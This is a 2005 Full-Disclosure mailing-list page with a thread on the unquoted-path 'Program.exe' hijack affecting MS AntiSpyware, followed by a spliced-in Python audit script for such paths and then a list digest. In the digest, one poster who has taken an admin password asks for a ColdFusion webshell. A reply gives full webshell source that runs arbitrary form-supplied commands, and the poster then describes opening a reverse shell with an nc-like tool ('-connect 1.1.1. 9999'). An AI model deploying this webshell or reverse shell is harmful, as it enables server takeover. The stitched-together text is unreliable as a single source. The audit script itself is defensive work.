
RE: [Full-disclosure] Useless tidbit (MS AntiSpyware)



Interesting. Has this always been that way? While it's not a huge gaping hole, 
it's definitely concerning. At least to me.

Steve

 

-----Original Message-----
From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx 
[mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf Of pretty vacant
Sent: Tuesday, May 10, 2005 9:53 AM
To: James Tucker
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] Useless tidbit

You may or may not know that Windows applications often use the registry to 
store information about where to find applications within their file system. 
Due to the way in which Windows handles filenames, situations where this 
information is stored in an unquoted fashion can leave the application open to 
an attack commonly referred to as the "Program.exe trick".

As you know, it's quite common to have files and/or directories with spaces in 
the name (e.g. C:\Program Files). Windows is unique in that it essentially 
doesn't exactly know what it's doing if the command isn't quoted and contains 
spaces. For example, look at the following command:

c:\program files\windows media player\wmplayer

If unquoted, Windows tries the following:

1st try
Execute: c:\program.exe
Arg1: files\windows
Arg2: media
Arg3: player\wmplayer

2nd try
Execute: "c:\program files\windows.exe"
Arg1: media
Arg2: player\wmplayer

3rd try
Execute: "c:\program files\windows media"
Arg1: player\wmplayer

4th try
Execute: "c:\program files\windows media player\wmplayer.exe"

Well, in the case of MS AntiSpyware (and hundreds of other applications), it 
starts up by executing "AntiSpywareMain.exe", which in turn displays a nice 
splash screen and performs some other misc activities before calling 
gsasDtServ.exe. The problem is that the execution of gsasDtServ.exe is 
unquoted: while the app tries to execute c:\program files\microsoft 
antispyware\gsasDtServ.exe, if c:\program.exe exists, it will be executed 
instead and MS AntiSpyware never actually gets loaded.

With XP SP2, the OS will actually warn you about files like c:\Program.bat or 
c:\Program.exe, but not about c:\program files\internet.exe.

Sadly, this isn't uncommon, and when I tested this on my system the first time, 
7 applications were executed over a 48 hour period. Try it for yourself. My 
Program.exe logs the executing user and command args to c:\program.log.

 

 

On Tue, 10 May 2005, James Tucker wrote:

> It appears this was a "trick" that I missed, can you provide more info?
>
> thanks.
>
> On 5/9/05, pretty vacant <optimist@xxxxxxxxxxxxxxx> wrote:
> > Interesting tidbit. The old c:\program.exe trick prevents MS 
> > Anti-Spyware from loading at login. :) 
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>

_______________________________________________

Full-Disclosure - We believe in it.

Charter: http://lists.grok.org.uk/full-disclosure-charter.html

Hosted and sponsored by Secunia - http://secunia.com/
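The candidate sequence pretty vacant lays out above is the same one an administrator can walk through to audit stored command lines before anyone else does. What follows is an added example, not code from any of the posts above and not anything shipped by Microsoft: a small Python script that splits a stored command into program and arguments (a heuristic that treats the text up to the first ".exe" as the program), enumerates the paths CreateProcess would try for an unquoted program string containing spaces (each space-delimited prefix, with ".exe" appended where the prefix has no extension, as documented for CreateProcess; so its third candidate for the wmplayer example is "c:\program files\windows media.exe" rather than the bare form listed above), and produces the quoted form that closes the hole. SAMPLE_ENTRIES is constructed sample data in the shape of Run-key or service ImagePath values, not real registry contents; the function names are my own.

```python
import re

# Constructed sample data: (value name, command) pairs in the shape one would
# read from a Run key or a service ImagePath. Not real registry contents.
SAMPLE_ENTRIES = [
    ("gsasDtServ", r"c:\program files\microsoft antispyware\gsasDtServ.exe"),
    ("wmplayer",   r"c:\program files\windows media player\wmplayer"),
    ("quoted-ok",  r'"c:\program files\microsoft antispyware\gsasDtServ.exe" /background'),
    ("nospace-ok", r"c:\windows\system32\notepad.exe"),
]

# Program text runs through the first ".exe"; anything after whitespace is arguments.
_EXE_RE = re.compile(r"(?i)^(.*?\.exe)(\s.*)?$")


def split_program(cmd: str):
    """Split a stored command into (program, args, quoted).

    A leading double-quoted section is the program verbatim, so it is safe
    regardless of spaces. Otherwise the program is taken through the first
    '.exe' (or the whole string when there is none). Heuristic, but enough
    for an audit of Run keys and service paths.
    """
    s = cmd.strip()
    if s.startswith('"'):
        close = s.find('"', 1)
        if close < 0:
            return s[1:], "", True
        return s[1:close], s[close + 1:].strip(), True
    m = _EXE_RE.match(s)
    if m:
        return m.group(1), (m.group(2) or "").strip(), False
    return s, "", False


def candidate_paths(program: str):
    """Paths CreateProcess tries, in order, for an unquoted program string
    with spaces: each space-delimited prefix, with '.exe' appended when the
    prefix's last path component carries no extension, ending with the full
    path. The last entry is the intended target; every earlier one is a
    location where a planted file would run instead."""
    words = program.split(" ")
    out = []
    for i in range(1, len(words) + 1):
        prefix = " ".join(words[:i])
        base = prefix.rsplit("\\", 1)[-1]
        out.append(prefix if "." in base else prefix + ".exe")
    return out


def quote_command(cmd: str) -> str:
    """Hardened form of a command: program wrapped in double quotes, arguments untouched."""
    program, args, _ = split_program(cmd)
    return f'"{program}"' + (f" {args}" if args else "")


def audit(entries):
    """Report every entry whose program path is unquoted and contains a space.
    Returns a list of (name, paths that would be tried first, fixed command)."""
    findings = []
    for name, cmd in entries:
        program, _, quoted = split_program(cmd)
        if quoted or " " not in program:
            continue
        hijack_points = candidate_paths(program)[:-1]
        findings.append((name, hijack_points, quote_command(cmd)))
    return findings


if __name__ == "__main__":
    for name, hijack_points, fixed in audit(SAMPLE_ENTRIES):
        print(f"[{name}] unquoted path with spaces")
        for p in hijack_points:
            print(f"   would run first if present: {p}")
        print(f"   fix: {fixed}")
```

Run as-is it reports the two unquoted sample entries and skips the quoted one and the one without spaces. In practice the entries would be read from the Run keys and service ImagePath values; a finding is remediated by storing the quoted form shown in the fix line, and the listed paths are the ones to confirm do not exist and whose parent directories should not be writable by ordinary users, which covers the deeper locations (such as c:\program files\internet.exe above) that the XP SP2 warning about c:\Program.exe does not.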


full-disclosure-request@xxxxxxxxxxxxxxxxx wrote:

Send Full-Disclosure mailing list submissions to
full-disclosure@xxxxxxxxxxxxxxxxx

To subscribe or unsubscribe via the World Wide Web, visit
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request@xxxxxxxxxxxxxxxxx

You can reach the person managing the list at
full-disclosure-owner@xxxxxxxxxxxxxxxxx

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."


Note to digest recipients - when replying to digest posts, please trim your 
post appropriately. Thank you.


Today's Topics:

1. List Charter (John Cartwright)
2. Re: Fwd: GWAVA Sender Notification (Content filter) (James Tucker)
3. Re: coldfusion pentest (fatb)
4. Re: coldfusion pentest (fatb)


----------------------------------------------------------------------

Message: 1
Date: Tue, 10 May 2005 10:02:23 +0100
From: John Cartwright 
Subject: [Full-disclosure] List Charter
To: full-disclosure@xxxxxxxxxxxxxxxxx
Message-ID: <20050510090223.GA21817@xxxxxxxxxxx>
Content-Type: text/plain; charset=us-ascii

Hi

FYI: I have disabled monthly password reminders due to the increasing
problem of archive sites storing them verbatim without filtering. 
Anyone running such an archive is encouraged to change their password
if necessary.

A password reminder is always available via the web interface in any
case. Additionally I have moved to more secure random passwords for
new members.

Cheers
- John

[Full-Disclosure] Mailing List Charter
John Cartwright 


- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing 
list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily 
concerned with security issues and their discussion. The list is 
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.


- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface 
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to 
full-disclosure-request@xxxxxxxxxxxxxxxxx, send the word 'help' in 
either the message subject or body for details.


- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to 
accept submissions from non-members based on individual merit and 
relevance.

It is expected that the list will be largely self-policing, however in
special circumstances (eg spamming, misappropriation) then offending 
members may be removed from the list by the management.

An archive of postings is available at 
http://lists.grok.org.uk/pipermail/full-disclosure/.


- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for 
instance announcement and discussion thereof, exploit techniques and 
code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is 
forbidden. Disagreements, flames, arguments, and off-topic discussion 
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. 
Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they 
should use discretion in executing any tools or code distributed via
this list.


- Posting Guidelines -

The primary language of this list is English. Members are expected to 
maintain a reasonable standard of netiquette when posting to the list. 

Quoting should not exceed that which is necessary to convey context, 
this is especially relevant to members subscribed to the digested 
version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will 
preferably be short and to the point, and those containing 
'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or 
S/MIME signatures, proof-of-concept code, etc) but must not be active 
(in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to 
list postings. Offenders will be excluded from the mailing list until 
the problem is corrected.

Members may post to the list by emailing 
full-disclosure@xxxxxxxxxxxxxxxxx. Do not send subscription/
unsubscription mails to this address, use the -request address 
mentioned above.


- Charter Additions/Changes -

The list charter will be published at 
http://lists.grok.org.uk/full-disclosure-charter.html.

In addition, the charter will be posted monthly to the list by the 
management.

Alterations will be made after consultation with list members and a 
consensus has been reached.


------------------------------

Message: 2
Date: Tue, 10 May 2005 10:11:56 +0100
From: James Tucker 
Subject: Re: [Full-disclosure] Fwd: GWAVA Sender Notification (Content
filter)
To: "Valdis.Kletnieks@xxxxxx" 
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
Message-ID: 
Content-Type: text/plain; charset=ISO-8859-1

marketing is a "wonderful" thing.

On 5/10/05, Valdis.Kletnieks@xxxxxx wrote:
> On Tue, 10 May 2005 02:32:41 BST, James Tucker said:
> > Surely this kind of message is a really bad idea.
> 
> You know it, I know it, and the A/V vendors know it.
> 
> > What is the possible true business value of such a filter?
> 
> The true business value is for the A/V vendor, who can blat out a
> free spam to the forged MAIL FROM: address (which is probably scraped off
> a disk by the worm/virus and therefore likely an actual address).
> 
> In this case, the bozos at GWAVA can spam you about finding something they
> didn't consider acceptable.
> 
> > What is the potential impact upon security to disclose the information
> > that this mail does?
> 
> It demonstrates that the site running it is lame enough to still be running
> A/V software that spams people.
> 
> > What is the cost of deployment of this system against the costs
> > related to its potential, and actual effects?
> 
> The GWAVA people don't care. They've been paid for the product already, and
> they're not the ones paying for the bandwidth.
> 
> Remember - you're talking here about a market segment *founded* on the 
> business model that *partially* patching some other vendor's broken software
> will lead to a permanent gravy train. Once you've wrapped your brain around
> the morals and ethics of that business model, it's obviously a very tiny step
> to spamming other people about the wonders of the product.
> 
> 
>


------------------------------

Message: 3
Date: Tue, 10 May 2005 17:12:00 +0800
From: "fatb" 
Subject: Re: [Full-disclosure] coldfusion pentest
To: "Javier Reoyo" 
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
Message-ID: <007001c55540$cdd9d440$3801a8c0@bill>
Content-Type: text/plain; charset="gb2312"

thx :)

the script from securiteam was from Kurt Grutzmacher originally; it could not 
run on my box

and I successfully got a working shell by uploading a nc-like tool and using the 
following script to run it



arguments="-connect 1.1.1. 9999"
timeout="20">




no matter how, I thought many guys who, like me, need a working cf 
webshell, because the upload script does not allow us to upload exe or some other 
kinds of files



----- Original Message ----- 
From: "Javier Reoyo" 
To: 
Sent: Tuesday, May 10, 2005 4:31 PM
Subject: Re: [Full-disclosure] coldfusion pentest


> Hi fatb,
> 
> 
> this is from mailing of securiteam. Try it.
> 
> ColdFusion Web Shell
> ------------------------------------------------------------------------
> 
> 
> SUMMARY
> 
> 
> 
> DETAILS
> 
> The following source code will generate a web based shell whenever it is
> executed under the ColdFusion environment.
> 
> Tool source code:
> <html>
> <body>
> 
> <cfoutput>
> <table>
> <form method="POST" action="cfexec.cfm">
> <tr>
> <td>Command:
> <td> <input type=text name="cmd" size=50 <cfif isdefined("form.cmd")>
> value="#form.cmd#" > <br>
> 
> <tr>
> <td>Options:
> <td> <input type=text name="opts" size=50 <cfif
> isdefined("form.opts")> value="#form.opts#" ><br> 
> 
> <tr>
> <td>Timeout:
> <td><input type=text name="timeout" size=4 <cfif
> isdefined("form.timeout")> value="#form.timeout#" <cfelse> value="5"
> > 
> 
> 
> <input type=submit value="Exec" >
> 
> 
> <cfsavecontent variable="myVar">
> <cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
> "#Form.timeout#">
> 
> 
> <pre>
> #myVar#
> 


> 
> 
> 
> 
> 
> ADDITIONAL INFORMATION
> 
> The information has been provided by Kurt
> Grutzmacher.
> 
> 
> 
> ========================================
> 
> ----- Original Message ----- 
> From: "fatb" 
> To: 

> Cc: 
> Sent: Tuesday, May 10, 2005 4:43 AM
> Subject: [Full-disclosure] coldfusion pentest
> 
> 
>> Hi all guys
>>
>> I've succeeded in getting the admin's passwd of the web interface
>>
>> and I can upload any kinds of files to the server
>>
>> the server is running coldfusion 4.5 with iis 5.0
>>
>> but I can not find a coldfusion webshell to continue
>>
>> anybody could be kind enough to send me a working coldfusion webshell
>>
>> thx in advance!
> 
> 
> ----------------------------------------------------------------------------
> ----
> 
> 
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

------------------------------

Message: 4
Date: Tue, 10 May 2005 17:19:59 +0800
From: "fatb" 
Subject: Re: [Full-disclosure] coldfusion pentest
To: "Javier Reoyo" 
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
Message-ID: <007901c55541$7e11ad10$3801a8c0@bill>
Content-Type: text/plain; charset="gb2312"

thx :)

the script from securiteam was from Kurt Grutzmacher originally; it could not 
run on my box

and I successfully got a working shell by uploading a nc-like tool and using the 
following script to run it



arguments="-connect 1.1.1. 9999"
timeout="20">




no matter how, I thought many guys who, like me, need a working cf 
webshell, because the upload script does not allow us to upload exe or some other 
kinds of files



----- Original Message ----- 
From: "Javier Reoyo" 
To: 
Sent: Tuesday, May 10, 2005 4:31 PM
Subject: Re: [Full-disclosure] coldfusion pentest


> Hi fatb,
> 
> 
> this is from mailing of securiteam. Try it.
> 
> ColdFusion Web Shell
> ------------------------------------------------------------------------
> 
> 
> SUMMARY
> 
> 
> 
> DETAILS
> 
> The following source code will generate a web based shell whenever it is
> executed under the ColdFusion environment.
> 
> Tool source code:
> <html>
> <body>
> 
> <cfoutput>
> <table>
> <form method="POST" action="cfexec.cfm">
> <tr>
> <td>Command:
> <td> <input type=text name="cmd" size=50 <cfif isdefined("form.cmd")>
> value="#form.cmd#" > <br>
> 
> <tr>
> <td>Options:
> <td> <input type=text name="opts" size=50 <cfif
> isdefined("form.opts")> value="#form.opts#" ><br> 
> 
> <tr>
> <td>Timeout:
> <td><input type=text name="timeout" size=4 <cfif
> isdefined("form.timeout")> value="#form.timeout#" <cfelse> value="5"
> > 
> 
> 
> <input type=submit value="Exec" >
> 
> 
> <cfsavecontent variable="myVar">
> <cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
> "#Form.timeout#">
> 
> 
> <pre>
> #myVar#
> 


> 
> 
> 
> 
> 
> ADDITIONAL INFORMATION
> 
> The information has been provided by Kurt
> Grutzmacher.
> 
> 
> 
> ========================================
> 
> ----- Original Message ----- 
> From: "fatb" 
> To: 

> Cc: 
> Sent: Tuesday, May 10, 2005 4:43 AM
> Subject: [Full-disclosure] coldfusion pentest
> 
> 
>> Hi all guys
>>
>> I've succeeded in getting the admin's passwd of the web interface
>>
>> and I can upload any kinds of files to the server
>>
>> the server is running coldfusion 4.5 with iis 5.0
>>
>> but I can not find a coldfusion webshell to continue
>>
>> anybody could be kind enough to send me a working coldfusion webshell
>>
>> thx in advance!
> 
> 
> ----------------------------------------------------------------------------
> ----
> 
> 
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

------------------------------


End of Full-Disclosure Digest, Vol 3, Issue 18
**********************************************


                